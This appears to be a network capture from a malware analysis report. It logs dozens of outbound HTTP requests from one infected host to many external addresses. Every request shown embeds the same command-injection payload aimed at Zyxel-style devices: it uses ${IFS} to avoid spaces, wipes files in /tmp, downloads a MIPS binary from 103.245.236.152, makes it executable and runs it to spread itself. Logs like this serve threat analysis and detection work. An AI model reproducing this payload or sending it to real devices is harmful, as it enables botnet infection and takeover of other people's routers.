                                      Jan 14, 2024 15:50:55.508161068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6724192.168.2.1455350161.37.34.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508198023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6725192.168.2.143759618.6.38.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508229017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6726192.168.2.1444622174.110.48.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508286953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6727192.168.2.143570476.241.22.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508331060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6728192.168.2.145987885.201.17.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508373022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6729192.168.2.145263251.90.14.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508418083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6730192.168.2.1460236211.156.218.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508446932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6731192.168.2.145738247.169.234.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508497000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6732192.168.2.1450642162.206.3.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508529902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6733192.168.2.144484257.49.178.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508577108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6734192.168.2.143832052.216.13.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508609056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6735192.168.2.143470257.79.199.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508649111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6736192.168.2.1452456178.30.20.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508691072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6737192.168.2.1453046160.60.177.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508719921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6738192.168.2.143426646.165.172.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508761883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6739192.168.2.1451798113.115.233.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508804083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6740192.168.2.1460600196.131.22.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508841991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6741192.168.2.1434066134.208.117.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508914948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6742192.168.2.1449864162.90.183.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508959055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6743192.168.2.1450652196.165.175.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508986950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6744192.168.2.1457592168.66.115.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509037971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6745192.168.2.144757282.239.155.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509068012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6746192.168.2.1446288131.120.111.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509099960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6747192.168.2.1433618112.113.2.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509165049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6748192.168.2.1443066218.174.77.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509190083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6749192.168.2.1436512116.7.141.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509219885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6750192.168.2.14436529.107.54.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509277105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6751192.168.2.1444702216.204.119.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509321928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6752192.168.2.145456292.31.179.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509358883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6753192.168.2.144761646.58.244.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509408951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6754192.168.2.1433118113.108.107.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509459019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6755192.168.2.1433796101.130.238.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509506941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6756192.168.2.144271067.82.98.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509530067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6757192.168.2.145936682.73.42.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509560108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6758192.168.2.145043896.25.254.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509629011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6759192.168.2.143615818.51.218.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509649992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6760192.168.2.143409087.194.222.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509685993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6761192.168.2.1457828103.27.80.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509715080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6762192.168.2.1443876148.214.193.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509766102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6763192.168.2.1455078163.88.114.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509795904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6764192.168.2.1459066142.121.90.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509828091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6765192.168.2.145653453.98.141.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509877920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6766192.168.2.144917043.209.52.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509907007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6767192.168.2.144774846.15.146.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509942055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6768192.168.2.1437188192.56.109.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.509979010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6769192.168.2.144047484.189.213.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.510009050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6770192.168.2.1458578165.89.183.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.510060072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6771192.168.2.143558858.105.86.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.510118961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6772192.168.2.14609202.70.146.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522211075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6773192.168.2.1451206130.168.193.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522273064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6774192.168.2.1457314134.82.26.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522305965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6775192.168.2.1454860147.34.164.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522371054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6776192.168.2.145891671.40.108.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522408962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6777192.168.2.144665244.44.192.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522458076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6778192.168.2.144854279.97.55.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522490978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6779192.168.2.1444828174.8.175.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522536039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6780192.168.2.146075079.191.190.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522576094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6781192.168.2.143529281.223.193.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522622108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6782192.168.2.1446884174.45.31.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522655010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6783192.168.2.1453706125.63.121.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522690058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6784192.168.2.1444838183.6.186.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522737980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6785192.168.2.1437094211.178.33.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522774935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6786192.168.2.144545299.28.106.165443
                                      TimestampBytes transferredDirectionData
